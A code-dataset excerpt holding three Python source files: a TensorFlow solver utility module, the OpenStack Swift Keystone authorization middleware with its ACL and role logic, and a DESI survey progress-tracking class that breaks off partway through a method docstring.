code | repo_name | path | language | license | size
---|---|---|---|---|---|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility functions for solvers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import tensorflow as tf
def create_operator(matrix):
"""Creates a linear operator from a rank-2 tensor."""
linear_operator = collections.namedtuple(
"LinearOperator", ["shape", "dtype", "apply", "apply_adjoint"])
# TODO(rmlarsen): Handle SparseTensor.
shape = matrix.get_shape()
if shape.is_fully_defined():
shape = shape.as_list()
else:
shape = tf.shape(matrix)
return linear_operator(
shape=shape,
dtype=matrix.dtype,
apply=lambda v: tf.matmul(matrix, v, adjoint_a=False),
apply_adjoint=lambda v: tf.matmul(matrix, v, adjoint_a=True))
# TODO(rmlarsen): Measure if we should just call matmul.
def dot(x, y):
return tf.reduce_sum(tf.conj(x) * y)
# TODO(rmlarsen): Implement matrix/vector norm op in C++ in core.
# We need 1-norm, inf-norm, and Frobenius norm.
def l2norm_squared(v):
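  # tf.nn.l2_loss(v) computes sum(v**2) / 2, so multiply by 2 to get the
  # squared L2 norm.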
return tf.constant(2, dtype=v.dtype.base_dtype) * tf.nn.l2_loss(v)
def l2norm(v):
return tf.sqrt(l2norm_squared(v))
def l2normalize(v):
norm = l2norm(v)
return v / norm, norm
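A minimal usage sketch for the helpers above (not part of the original file; it assumes a TF1-style graph/session environment, matching the `tf.contrib` era of this code):

```python
import numpy as np

# Wrap a dense rank-2 tensor and apply it to a vector.
matrix = tf.constant(np.random.randn(4, 4))
op = create_operator(matrix)
v = tf.constant(np.random.randn(4, 1))
Av = op.apply(v)             # matmul(A, v)
AHv = op.apply_adjoint(v)    # matmul(A^H, v)
v_unit, v_norm = l2normalize(v)

with tf.Session() as sess:
    # Both values are the same L2 norm of v.
    print(sess.run([l2norm(v), v_norm]))
```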
| AndreasMadsen/tensorflow | tensorflow/contrib/solvers/python/ops/util.py | Python | apache-2.0 | 1,889 |
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from swift.common import utils as swift_utils
from swift.common.http import is_success
from swift.common.middleware import acl as swift_acl
from swift.common.request_helpers import get_sys_meta_prefix
from swift.common.swob import HTTPNotFound, HTTPForbidden, HTTPUnauthorized
from swift.common.utils import config_read_reseller_options, list_from_csv
from swift.proxy.controllers.base import get_account_info
import functools
PROJECT_DOMAIN_ID_HEADER = 'x-account-project-domain-id'
PROJECT_DOMAIN_ID_SYSMETA_HEADER = \
get_sys_meta_prefix('account') + 'project-domain-id'
# a string that is unique w.r.t valid ids
UNKNOWN_ID = '_unknown'
class KeystoneAuth(object):
"""Swift middleware to Keystone authorization system.
In Swift's proxy-server.conf add this middleware to your pipeline::
[pipeline:main]
pipeline = catch_errors cache authtoken keystoneauth proxy-server
Make sure you have the authtoken middleware before the
keystoneauth middleware.
The authtoken middleware will take care of validating the user and
keystoneauth will authorize access.
    The authtoken middleware is shipped with keystonemiddleware - it
    has no dependencies other than itself, so you can either install it
    by copying the file directly into your Python path or by installing
    keystonemiddleware.
If support is required for unvalidated users (as with anonymous
access) or for formpost/staticweb/tempurl middleware, authtoken will
need to be configured with ``delay_auth_decision`` set to true. See
the Keystone documentation for more detail on how to configure the
authtoken middleware.
    In proxy-server.conf you will need to set account auto-creation to
    true::
[app:proxy-server]
account_autocreate = true
And add a swift authorization filter section, such as::
[filter:keystoneauth]
use = egg:swift#keystoneauth
operator_roles = admin, swiftoperator
The user who is able to give ACL / create Containers permissions
will be the user with a role listed in the ``operator_roles``
setting which by default includes the admin and the swiftoperator
roles.
The keystoneauth middleware maps a Keystone project/tenant to an account
in Swift by adding a prefix (``AUTH_`` by default) to the tenant/project
    id. For example, if the project id is ``1234``, the path is
``/v1/AUTH_1234``.
If the ``is_admin`` option is ``true``, a user whose username is the same
as the project name and who has any role on the project will have access
rights elevated to be the same as if the user had one of the
``operator_roles``. Note that the condition compares names rather than
UUIDs. This option is deprecated. It is ``false`` by default.
If you need to have a different reseller_prefix to be able to
mix different auth servers you can configure the option
``reseller_prefix`` in your keystoneauth entry like this::
reseller_prefix = NEWAUTH
Don't forget to also update the Keystone service endpoint configuration to
use NEWAUTH in the path.
It is possible to have several accounts associated with the same project.
This is done by listing several prefixes as shown in the following
    example::
reseller_prefix = AUTH, SERVICE
This means that for project id '1234', the paths '/v1/AUTH_1234' and
'/v1/SERVICE_1234' are associated with the project and are authorized
    using roles that a user has with that project. The core use of this
    feature is the ability to provide different rules for each account
    prefix. The following parameters may be prefixed with the appropriate
    prefix:
operator_roles
service_roles
For backward compatibility, no prefix implies the parameter
applies to all reseller_prefixes. Here is an example, using two
prefixes::
reseller_prefix = AUTH, SERVICE
# The next three lines have identical effects (since the first applies
# to both prefixes).
operator_roles = admin, swiftoperator
AUTH_operator_roles = admin, swiftoperator
SERVICE_operator_roles = admin, swiftoperator
# The next line only applies to accounts with the SERVICE prefix
SERVICE_operator_roles = admin, some_other_role
X-Service-Token tokens are supported by the inclusion of the service_roles
configuration option. When present, this option requires that the
X-Service-Token header supply a token from a user who has a role listed
in service_roles. Here is an example configuration::
reseller_prefix = AUTH, SERVICE
AUTH_operator_roles = admin, swiftoperator
SERVICE_operator_roles = admin, swiftoperator
SERVICE_service_roles = service
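    For example, a request would then supply both tokens (hypothetical
    values)::

        X-Auth-Token: <token scoped to the project>
        X-Service-Token: <token for a user with a role in service_roles>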
The keystoneauth middleware supports cross-tenant access control using
the syntax ``<tenant>:<user>`` to specify a grantee in container Access
Control Lists (ACLs). For a request to be granted by an ACL, the grantee
``<tenant>`` must match the UUID of the tenant to which the request
token is scoped and the grantee ``<user>`` must match the UUID of the
user authenticated by the request token.
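    For example (hypothetical ids), to grant access to the user with id
    ``1234`` in the tenant with id ``5678``, the container ACL would
    contain the entry ``5678:1234``.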
    Note that names must no longer be used in cross-tenant ACLs because,
    with the introduction of domains in keystone, names are no longer
    globally unique.
For backwards compatibility, ACLs using names will be granted by
keystoneauth when it can be established that the grantee tenant,
the grantee user and the tenant being accessed are either not yet in a
domain (e.g. the request token has been obtained via the keystone v2
API) or are all in the default domain to which legacy accounts would
have been migrated. The default domain is identified by its UUID,
which by default has the value ``default``. This can be changed by
setting the ``default_domain_id`` option in the keystoneauth
configuration::
default_domain_id = default
The backwards compatible behavior can be disabled by setting the config
option ``allow_names_in_acls`` to false::
allow_names_in_acls = false
To enable this backwards compatibility, keystoneauth will attempt to
determine the domain id of a tenant when any new account is created,
and persist this as account metadata. If an account is created for a tenant
using a token with reselleradmin role that is not scoped on that tenant,
keystoneauth is unable to determine the domain id of the tenant;
keystoneauth will assume that the tenant may not be in the default domain
and therefore not match names in ACLs for that account.
By default, middleware higher in the WSGI pipeline may override auth
processing, useful for middleware such as tempurl and formpost. If you know
you're not going to use such middleware and you want a bit of extra
security you can disable this behaviour by setting the ``allow_overrides``
option to ``false``::
allow_overrides = false
:param app: The next WSGI app in the pipeline
:param conf: The dict of configuration values
"""
def __init__(self, app, conf):
self.app = app
self.conf = conf
self.logger = swift_utils.get_logger(conf, log_route='keystoneauth')
self.reseller_prefixes, self.account_rules = \
config_read_reseller_options(conf,
dict(operator_roles=['admin',
'swiftoperator'],
service_roles=[]))
self.reseller_admin_role = conf.get('reseller_admin_role',
'ResellerAdmin').lower()
config_is_admin = conf.get('is_admin', "false").lower()
self.is_admin = swift_utils.config_true_value(config_is_admin)
config_overrides = conf.get('allow_overrides', 't').lower()
self.allow_overrides = swift_utils.config_true_value(config_overrides)
self.default_domain_id = conf.get('default_domain_id', 'default')
self.allow_names_in_acls = swift_utils.config_true_value(
conf.get('allow_names_in_acls', 'true'))
def __call__(self, environ, start_response):
identity = self._keystone_identity(environ)
        # Check whether middleware such as tempurl or formpost has set
        # the swift.authorize_override environ key and wants to control
        # the authorization itself
if (self.allow_overrides and
environ.get('swift.authorize_override', False)):
msg = 'Authorizing from an overriding middleware'
self.logger.debug(msg)
return self.app(environ, start_response)
if identity:
self.logger.debug('Using identity: %r', identity)
environ['keystone.identity'] = identity
environ['REMOTE_USER'] = identity.get('tenant')
env_identity = self._integral_keystone_identity(environ)
environ['swift.authorize'] = functools.partial(
self.authorize, env_identity)
user_roles = (r.lower() for r in identity.get('roles', []))
if self.reseller_admin_role in user_roles:
environ['reseller_request'] = True
else:
self.logger.debug('Authorizing as anonymous')
environ['swift.authorize'] = self.authorize_anonymous
environ['swift.clean_acl'] = swift_acl.clean_acl
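        # Wrap start_response so that, if the account sysmeta carries a
        # project domain id, it is echoed back to clients as the
        # x-account-project-domain-id response header.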
def keystone_start_response(status, response_headers, exc_info=None):
project_domain_id = None
for key, val in response_headers:
if key.lower() == PROJECT_DOMAIN_ID_SYSMETA_HEADER:
project_domain_id = val
break
if project_domain_id:
response_headers.append((PROJECT_DOMAIN_ID_HEADER,
project_domain_id))
return start_response(status, response_headers, exc_info)
return self.app(environ, keystone_start_response)
def _keystone_identity(self, environ):
"""Extract the identity from the Keystone auth component."""
        # In a future release, the user id will be added to
        # env['keystone.identity'] by using _integral_keystone_identity
        # to replace the current _keystone_identity. It is kept as-is in
        # this release for backwards compatibility.
if environ.get('HTTP_X_IDENTITY_STATUS') != 'Confirmed':
return
roles = []
if 'HTTP_X_ROLES' in environ:
roles = environ['HTTP_X_ROLES'].split(',')
identity = {'user': environ.get('HTTP_X_USER_NAME'),
'tenant': (environ.get('HTTP_X_TENANT_ID'),
environ.get('HTTP_X_TENANT_NAME')),
'roles': roles}
return identity
def _integral_keystone_identity(self, environ):
"""Extract the identity from the Keystone auth component."""
if environ.get('HTTP_X_IDENTITY_STATUS') != 'Confirmed':
return
roles = list_from_csv(environ.get('HTTP_X_ROLES', ''))
service_roles = list_from_csv(environ.get('HTTP_X_SERVICE_ROLES', ''))
identity = {'user': (environ.get('HTTP_X_USER_ID'),
environ.get('HTTP_X_USER_NAME')),
'tenant': (environ.get('HTTP_X_TENANT_ID'),
environ.get('HTTP_X_TENANT_NAME')),
'roles': roles,
'service_roles': service_roles}
token_info = environ.get('keystone.token_info', {})
auth_version = 0
user_domain = project_domain = (None, None)
if 'access' in token_info:
# ignore any domain id headers that authtoken may have set
auth_version = 2
elif 'token' in token_info:
auth_version = 3
user_domain = (environ.get('HTTP_X_USER_DOMAIN_ID'),
environ.get('HTTP_X_USER_DOMAIN_NAME'))
project_domain = (environ.get('HTTP_X_PROJECT_DOMAIN_ID'),
environ.get('HTTP_X_PROJECT_DOMAIN_NAME'))
identity['user_domain'] = user_domain
identity['project_domain'] = project_domain
identity['auth_version'] = auth_version
return identity
def _get_account_name(self, prefix, tenant_id):
return '%s%s' % (prefix, tenant_id)
def _account_matches_tenant(self, account, tenant_id):
"""Check if account belongs to a project/tenant"""
for prefix in self.reseller_prefixes:
if self._get_account_name(prefix, tenant_id) == account:
return True
return False
def _get_account_prefix(self, account):
"""Get the prefix of an account"""
# Empty prefix matches everything, so try to match others first
for prefix in [pre for pre in self.reseller_prefixes if pre != '']:
if account.startswith(prefix):
return prefix
if '' in self.reseller_prefixes:
return ''
return None
def _get_project_domain_id(self, environ):
info = get_account_info(environ, self.app, 'KS')
domain_id = info.get('sysmeta', {}).get('project-domain-id')
exists = is_success(info.get('status', 0))
return exists, domain_id
def _set_project_domain_id(self, req, path_parts, env_identity):
'''
Try to determine the project domain id and save it as
account metadata. Do this for a PUT or POST to the
account, and also for a container PUT in case that
causes the account to be auto-created.
'''
if PROJECT_DOMAIN_ID_SYSMETA_HEADER in req.headers:
return
version, account, container, obj = path_parts
method = req.method
if (obj or (container and method != 'PUT')
or method not in ['PUT', 'POST']):
return
tenant_id, tenant_name = env_identity['tenant']
exists, sysmeta_id = self._get_project_domain_id(req.environ)
req_has_id, req_id, new_id = False, None, None
if self._account_matches_tenant(account, tenant_id):
# domain id can be inferred from request (may be None)
req_has_id = True
req_id = env_identity['project_domain'][0]
if not exists:
# new account so set a domain id
new_id = req_id if req_has_id else UNKNOWN_ID
elif sysmeta_id is None and req_id == self.default_domain_id:
# legacy account, update if default domain id in req
new_id = req_id
elif sysmeta_id == UNKNOWN_ID and req_has_id:
# unknown domain, update if req confirms domain
new_id = req_id or ''
elif req_has_id and sysmeta_id != req_id:
self.logger.warn("Inconsistent project domain id: " +
"%s in token vs %s in account metadata."
% (req_id, sysmeta_id))
if new_id is not None:
req.headers[PROJECT_DOMAIN_ID_SYSMETA_HEADER] = new_id
def _is_name_allowed_in_acl(self, req, path_parts, identity):
if not self.allow_names_in_acls:
return False
user_domain_id = identity['user_domain'][0]
if user_domain_id and user_domain_id != self.default_domain_id:
return False
proj_domain_id = identity['project_domain'][0]
if proj_domain_id and proj_domain_id != self.default_domain_id:
return False
# request user and scoped project are both in default domain
tenant_id, tenant_name = identity['tenant']
version, account, container, obj = path_parts
if self._account_matches_tenant(account, tenant_id):
# account == scoped project, so account is also in default domain
allow = True
else:
# retrieve account project domain id from account sysmeta
exists, acc_domain_id = self._get_project_domain_id(req.environ)
allow = exists and acc_domain_id in [self.default_domain_id, None]
if allow:
self.logger.debug("Names allowed in acls.")
return allow
def _authorize_cross_tenant(self, user_id, user_name,
tenant_id, tenant_name, roles,
allow_names=True):
"""Check cross-tenant ACLs.
        Match ``tenant:user``, where tenant and user may each be an id, a
        name, or ``'*'``.
:param user_id: The user id from the identity token.
:param user_name: The user name from the identity token.
:param tenant_id: The tenant ID from the identity token.
:param tenant_name: The tenant name from the identity token.
:param roles: The given container ACL.
        :param allow_names: If True then attempt to match tenant and user names
                            as well as ids.
:returns: matched string if tenant(name/id/*):user(name/id/*) matches
the given ACL.
None otherwise.
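        For example (hypothetical ids): with ``roles`` containing
        ``'5678:1234'``, a call with ``user_id='1234'`` and
        ``tenant_id='5678'`` returns ``'5678:1234'``; with no matching
        entry it returns None.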
"""
tenant_match = [tenant_id, '*']
user_match = [user_id, '*']
if allow_names:
tenant_match = tenant_match + [tenant_name]
user_match = user_match + [user_name]
for tenant in tenant_match:
for user in user_match:
s = '%s:%s' % (tenant, user)
if s in roles:
return s
return None
def authorize(self, env_identity, req):
tenant_id, tenant_name = env_identity['tenant']
user_id, user_name = env_identity['user']
referrers, roles = swift_acl.parse_acl(getattr(req, 'acl', None))
        # allow OPTIONS requests to proceed as normal
if req.method == 'OPTIONS':
return
try:
part = req.split_path(1, 4, True)
version, account, container, obj = part
except ValueError:
return HTTPNotFound(request=req)
self._set_project_domain_id(req, part, env_identity)
user_roles = [r.lower() for r in env_identity.get('roles', [])]
user_service_roles = [r.lower() for r in env_identity.get(
'service_roles', [])]
# Give unconditional access to a user with the reseller_admin
# role.
if self.reseller_admin_role in user_roles:
msg = 'User %s has reseller admin authorizing'
self.logger.debug(msg, tenant_id)
req.environ['swift_owner'] = True
return
# If we are not reseller admin and user is trying to delete its own
# account then deny it.
if not container and not obj and req.method == 'DELETE':
# User is not allowed to issue a DELETE on its own account
msg = 'User %s:%s is not allowed to delete its own account'
self.logger.debug(msg, tenant_name, user_name)
return self.denied_response(req)
# cross-tenant authorization
matched_acl = None
if roles:
allow_names = self._is_name_allowed_in_acl(req, part, env_identity)
matched_acl = self._authorize_cross_tenant(user_id, user_name,
tenant_id, tenant_name,
roles, allow_names)
if matched_acl is not None:
log_msg = 'user %s allowed in ACL authorizing.'
self.logger.debug(log_msg, matched_acl)
return
acl_authorized = self._authorize_unconfirmed_identity(req, obj,
referrers,
roles)
if acl_authorized:
return
# Check if a user tries to access an account that does not match their
# token
if not self._account_matches_tenant(account, tenant_id):
log_msg = 'tenant mismatch: %s != %s'
self.logger.debug(log_msg, account, tenant_id)
return self.denied_response(req)
# Compare roles from tokens against the configuration options:
#
# X-Auth-Token role Has specified X-Service-Token role Grant
# in operator_roles? service_roles? in service_roles? swift_owner?
# ------------------ -------------- -------------------- ------------
# yes yes yes yes
# yes no don't care yes
# no don't care don't care no
# ------------------ -------------- -------------------- ------------
account_prefix = self._get_account_prefix(account)
operator_roles = self.account_rules[account_prefix]['operator_roles']
have_operator_role = set(operator_roles).intersection(
set(user_roles))
service_roles = self.account_rules[account_prefix]['service_roles']
have_service_role = set(service_roles).intersection(
set(user_service_roles))
if have_operator_role and (service_roles and have_service_role):
req.environ['swift_owner'] = True
elif have_operator_role and not service_roles:
req.environ['swift_owner'] = True
if req.environ.get('swift_owner'):
log_msg = 'allow user with role(s) %s as account admin'
self.logger.debug(log_msg, ','.join(have_operator_role.union(
have_service_role)))
return
        # If the user name matches the tenant name, make the user an
        # owner (deprecated is_admin behavior).
if self.is_admin and user_name == tenant_name:
self.logger.warning("the is_admin feature has been deprecated "
"and will be removed in the future "
"update your config file")
req.environ['swift_owner'] = True
return
if acl_authorized is not None:
return self.denied_response(req)
        # Check if we have the role in the user roles and allow it
for user_role in user_roles:
if user_role in (r.lower() for r in roles):
log_msg = 'user %s:%s allowed in ACL: %s authorizing'
self.logger.debug(log_msg, tenant_name, user_name,
user_role)
return
return self.denied_response(req)
def authorize_anonymous(self, req):
"""
Authorize an anonymous request.
:returns: None if authorization is granted, an error page otherwise.
"""
try:
part = req.split_path(1, 4, True)
version, account, container, obj = part
except ValueError:
return HTTPNotFound(request=req)
        # allow OPTIONS requests to proceed as normal
if req.method == 'OPTIONS':
return
is_authoritative_authz = (account and
(self._get_account_prefix(account) in
self.reseller_prefixes))
if not is_authoritative_authz:
return self.denied_response(req)
referrers, roles = swift_acl.parse_acl(getattr(req, 'acl', None))
authorized = self._authorize_unconfirmed_identity(req, obj, referrers,
roles)
if not authorized:
return self.denied_response(req)
def _authorize_unconfirmed_identity(self, req, obj, referrers, roles):
""""
Perform authorization for access that does not require a
confirmed identity.
:returns: A boolean if authorization is granted or denied. None if
a determination could not be made.
"""
# Allow container sync.
if (req.environ.get('swift_sync_key')
and (req.environ['swift_sync_key'] ==
req.headers.get('x-container-sync-key', None))
and 'x-timestamp' in req.headers):
log_msg = 'allowing proxy %s for container-sync'
self.logger.debug(log_msg, req.remote_addr)
return True
# Check if referrer is allowed.
if swift_acl.referrer_allowed(req.referer, referrers):
if obj or '.rlistings' in roles:
log_msg = 'authorizing %s via referer ACL'
self.logger.debug(log_msg, req.referrer)
return True
return False
def denied_response(self, req):
"""Deny WSGI Response.
Returns a standard WSGI response callable with the status of 403 or 401
depending on whether the REMOTE_USER is set or not.
"""
if req.remote_user:
return HTTPForbidden(request=req)
else:
return HTTPUnauthorized(request=req)
def filter_factory(global_conf, **local_conf):
"""Returns a WSGI filter app for use with paste.deploy."""
conf = global_conf.copy()
conf.update(local_conf)
def auth_filter(app):
return KeystoneAuth(app, conf)
return auth_filter
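For reference, a minimal sketch of how the factory wires into a WSGI stack (hypothetical; paste.deploy normally does this from proxy-server.conf as described in the class docstring):

```python
def simple_app(environ, start_response):
    # Stand-in for the rest of the proxy pipeline.
    start_response('200 OK', [('Content-Type', 'text/plain')])
    return [b'ok']

auth_filter = filter_factory({}, operator_roles='admin, swiftoperator')
app = auth_filter(simple_app)  # app is now a KeystoneAuth instance
```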
| dpgoetz/swift | swift/common/middleware/keystoneauth.py | Python | apache-2.0 | 25,905 |
"""Track progress of completed DESI observations.
"""
from __future__ import print_function, division
import os.path
import numpy as np
import astropy.table
import astropy.time
import astropy.units as u
import desimodel.io
import desiutil.log
import desisurvey.config
import desisurvey.utils
# Increment this value whenever a non-backwards compatible change to the
# table schema is introduced.
_version = 4
class Progress(object):
"""Initialize a progress tracking object.
Progress can either be restored from a file or created from scratch.
    The progress table is designed to minimize duplication of static tile data
that is already tabulated in the footprint definition table, except for
the PASS, RA, DEC columns which are useful for generating plots.
The progress table also does not capture ephemeris data that can be
easily reproduced from an exposure time stamp.
Parameters
----------
restore : str or astropy.table.Table or None
        Read an existing progress record from the specified file name or
        an existing table. A relative path name refers to the
        :meth:`configuration output path
        <desisurvey.config.Configuration.get_path>`. Creates a new progress
        record from scratch when None.
max_exposures : int
Maximum number of exposures of a single tile that a newly created
table will allocate space for. Ignored when restoring a previous
progress record.
"""
def __init__(self, restore=None, max_exposures=32):
self.log = desiutil.log.get_logger()
# Lookup the completeness SNR2 threshold to use.
config = desisurvey.config.Configuration()
self.min_snr2 = config.min_snr2_fraction()
if restore is None:
# Load the list of tiles to observe.
tiles = astropy.table.Table(
desimodel.io.load_tiles(onlydesi=True, extra=False,
tilesfile=config.tiles_file() ))
num_tiles = len(tiles)
# Initialize a new progress table.
meta = dict(VERSION=_version)
table = astropy.table.Table(meta=meta)
table['tileid'] = astropy.table.Column(
length=num_tiles, dtype=np.int32,
description='DESI footprint tile ID')
table['pass'] = astropy.table.Column(
length=num_tiles, dtype=np.int32,
description='Observing pass number starting at zero')
table['ra'] = astropy.table.Column(
length=num_tiles, description='TILE center RA in degrees',
unit='deg', format='%.1f')
table['dec'] = astropy.table.Column(
length=num_tiles, description='TILE center DEC in degrees',
unit='deg', format='%.1f')
table['status'] = astropy.table.Column(
length=num_tiles, dtype=np.int32,
description='Observing status: 0=none, 1=partial, 2=done')
table['covered'] = astropy.table.Column(
length=num_tiles, dtype=np.int32,
description='Tile covered on this day number >=0 (or -1)')
table['available'] = astropy.table.Column(
length=num_tiles, dtype=np.int32,
description='Tile available on this day number >=0 (or -1)')
table['planned'] = astropy.table.Column(
length=num_tiles, dtype=np.int32,
description='Tile first planned on this day number >=0 (or -1)')
# Add per-exposure columns.
table['mjd'] = astropy.table.Column(
length=num_tiles, shape=(max_exposures,), format='%.5f',
description='MJD of exposure start time')
table['exptime'] = astropy.table.Column(
length=num_tiles, shape=(max_exposures,), format='%.1f',
description='Exposure duration in seconds', unit='s')
table['snr2frac'] = astropy.table.Column(
length=num_tiles, shape=(max_exposures,), format='%.3f',
description='Fraction of target S/N**2 ratio achieved')
table['airmass'] = astropy.table.Column(
length=num_tiles, shape=(max_exposures,), format='%.1f',
description='Estimated airmass of observation')
table['seeing'] = astropy.table.Column(
length=num_tiles, shape=(max_exposures,), format='%.1f',
description='Estimated FWHM seeing of observation in arcsecs',
unit='arcsec')
table['transparency'] = astropy.table.Column(
length=num_tiles, shape=(max_exposures,), format='%.1f',
description='Estimated transparency of observation')
table['moonfrac'] = astropy.table.Column(
length=num_tiles, shape=(max_exposures,), format='%.3f',
description='Moon illuminated fraction (0-1)')
table['moonalt'] = astropy.table.Column(
length=num_tiles, shape=(max_exposures,), format='%.1f',
description='Moon altitude angle in degrees', unit='deg')
table['moonsep'] = astropy.table.Column(
length=num_tiles, shape=(max_exposures,), format='%.1f',
description='Moon-tile separation angle in degrees', unit='deg')
# Copy tile data.
table['tileid'] = tiles['TILEID']
table['pass'] = tiles['PASS']
table['ra'] = tiles['RA']
table['dec'] = tiles['DEC']
# Initialize other columns.
table['status'] = 0
table['covered'] = -1
table['available'] = -1
table['planned'] = -1
table['mjd'] = 0.
table['exptime'] = 0.
table['snr2frac'] = 0.
table['airmass'] = 0.
table['seeing'] = 0.
table['transparency'] = 0.
else:
if isinstance(restore, Progress):
table = restore._table
elif isinstance(restore, astropy.table.Table):
table = restore
else:
filename = config.get_path(restore)
if not os.path.exists(filename):
raise ValueError('Invalid restore: {0}.'.format(restore))
table = astropy.table.Table.read(filename)
self.log.info('Loaded progress from {0}.'.format(filename))
# Check that this table has the current version.
if table.meta['VERSION'] != _version:
raise RuntimeError(
'Progress table has incompatible version {0}.'
.format(table.meta['VERSION']))
# Check that the status column matches the current min_snr2.
snr2sum = table['snr2frac'].data.sum(axis=1)
if not np.all(snr2sum >= 0):
raise RuntimeError('Found invalid snr2frac values.')
status = np.ones_like(table['status'])
status[snr2sum == 0] = 0
status[snr2sum >= self.min_snr2] = 2
if not np.all(table['status'] == status):
self.log.warn('Updating status values for min(SNR2) = {0:.1f}.'
.format(self.min_snr2))
table['status'] = status
# We could do more sanity checks here, but they shouldn't be
# necessary unless the table has been modified outside this class.
# Initialize attributes from table data.
self._table = table
mjd = table['mjd'].data
observed = mjd > 0
if np.any(observed):
self._num_exp = np.count_nonzero(observed)
self._first_mjd = np.min(mjd[observed])
self._last_mjd = np.max(mjd[observed])
last = np.argmax(mjd.max(axis=1))
self._last_tile = self._table[last]
else:
self._num_exp = 0
self._first_mjd = self._last_mjd = 0.
self._last_tile = None
@property
def num_exp(self):
"""Number of exposures recorded."""
return self._num_exp
@property
def num_tiles(self):
"""Number of tiles in DESI footprint"""
return len(self._table)
@property
def first_mjd(self):
"""MJD of first exposure or 0 if no exposures have been added."""
return self._first_mjd
@property
def last_mjd(self):
"""MJD of most recent exposure or 0 if no exposures have been added."""
return self._last_mjd
@property
def last_tile(self):
"""Row corresponding to the last observed tile, or None."""
return self._last_tile
@property
def max_exposures(self):
"""Maximum allowed number of exposures of a single tile."""
return len(self._table[0]['mjd'])
def completed(self, include_partial=True, only_passes=None, as_tuple=False):
"""Number of tiles completed.
Completion is based on the sum of ``snr2frac`` values for all exposures
of each tiles. A completed tile (with ``status`` of 2) counts as one
towards the completion value, even if its ``snr2frac`` exceeds the
minimum required SNR**2 fraction.
Can be combined with :meth:`copy_range` to reconstruct the number of
completed observations over an arbitrary date range.
Parameters
----------
include_partial : bool
            Include partially completed tiles according to their sum of
            snr2frac values.
only_passes : tuple or int or None
Only include tiles in the specified pass or passes. All passes
are included when None.
as_tuple : bool
Return (num_complete, num_total, percent_complete) as a tuple
instead of just num_complete.
Returns
-------
float or tuple
Either num_complete or (num_complete, num_total, percent_complete)
depending on ``as_tuple``. The number of tiles completed will
always be an integer (returned as a float) when ``include_partial``
is False, and will generally be non-integer otherwise.
"""
# Restrict to the specified pass(es) if requested.
if only_passes is not None:
try:
only_passes = tuple(only_passes)
except TypeError:
only_passes = only_passes,
sel = np.in1d(self._table['pass'].data, only_passes)
table = self._table[sel]
else:
table = self._table
# Calculate the total SNR**2 for each tile.
snr2sum = table['snr2frac'].data.sum(axis=1)
# Count fully completed tiles as 1.
completed = snr2sum >= self.min_snr2
num_complete = float(np.count_nonzero(completed))
if include_partial:
# Add partial SNR**2 sums.
num_complete += snr2sum[~completed].sum()
if as_tuple:
num_total = len(table)
percent_complete = 100. * num_complete / num_total
return num_complete, num_total, percent_complete
else:
return num_complete
def save(self, filename, overwrite=True):
"""Save the current progress to a file.
The saved file can be restored from disk using our constructor,
although column descriptions will be lost since they are not
propagated when writing a table to a FITS file.
Parameters
----------
filename : str
Name of the file where the progress record should be saved. A
relative path name refers to the :meth:`configuration output path
<desisurvey.config.Configuration.get_path>`.
overwrite : bool
Silently overwrite any existing file when this is True.
"""
config = desisurvey.config.Configuration()
filename = config.get_path(filename)
self._table.write(filename, overwrite=overwrite)
self.log.info('Saved progress to {0}.'.format(filename))
def get_tile(self, tile_id):
"""Lookup the progress of a single tile.
Parameters
----------
tile_id : integer
Valid DESI footprint tile ID.
Returns
-------
astropy.table.Row
Row of progress table for the requested tile.
"""
row_sel = np.where(self._table['tileid'] == tile_id)[0]
if len(row_sel) != 1:
raise ValueError('Invalid tile_id {0}.'.format(tile_id))
return self._table[row_sel[0]]
def get_summary(self, include='observed'):
"""Get a per-tile summary of progress so far.
Returns a new table so any modifications are decoupled from our
internal table. Exposure MJD values are summarized as separate
``mjd_min`` and ``mjd_max`` columns, with both equal to zero for
un-observed tiles. The summary ``exptime`` and ``snr2frac`` columns
are sums of the individual exposures. The summary ``airmass``,
``seeing`` and ``transparency`` columns are means. A ``nexp`` column
counts the number of exposures for each tile. The moon parameters are
not summarized.
Can be combined with :meth:`copy_range` to summarize observations during
a range of dates.
Parameters
----------
include : 'all', 'observed', or 'completed'
Specify which tiles to include in the summary. The 'observed'
selection will include tiles that have been observed at least
once but have not yet reached their SNR**2 goal.
"""
min_status = dict(all=0, observed=1, completed=2)
if include not in min_status.keys():
raise ValueError('Invalid include option: pick one of {0}.'
.format(', '.join(min_status.keys())))
# Start a new summary table with the selected rows.
sel = self._table['status'] >= min_status[include]
summary = self._table[sel][[
'tileid', 'pass', 'ra', 'dec', 'status',
'covered', 'available', 'planned']]
# Summarize exposure start times.
col = self._table['mjd']
mjd = col.data[sel]
summary['mjd_min'] = astropy.table.Column(
mjd[:, 0], unit=col.unit, format=col.format,
description='First exposure start MJD')
summary['mjd_max'] = astropy.table.Column(
mjd.max(axis=1), unit=col.unit, format=col.format,
description='Last exposure start MJD')
# Sum the remaining per-exposure columns.
for name in (
'exptime', 'snr2frac', 'airmass', 'seeing', 'transparency'):
col = self._table[name]
summary[name] = astropy.table.Column(
col.data[sel].sum(axis=1), unit=col.unit, format=col.format,
description=col.description)
# Convert the airmass, seeing and transparency sums to means. We use
# mean rather than median since it is easier to calculate with a
# variable nexp.
nexp = (mjd > 0).sum(axis=1).astype(int)
mask = nexp > 0
summary['airmass'][mask] /= nexp[mask]
summary['seeing'][mask] /= nexp[mask]
summary['transparency'][mask] /= nexp[mask]
# Record the number of exposures in a new column.
summary['nexp'] = nexp
return summary
def copy_range(self, mjd_min=None, mjd_max=None):
"""Return a copy of progress during a date range.
Parameters
----------
mjd_min : float or None
Only include exposures with mjd >= mjd_min.
mjd_max : float
Only include exposures with mjd < mjd_max.
Returns
-------
Progress
New object with any exposures outside the specified MJD range
zeroed out and ``status`` values updated accordingly.
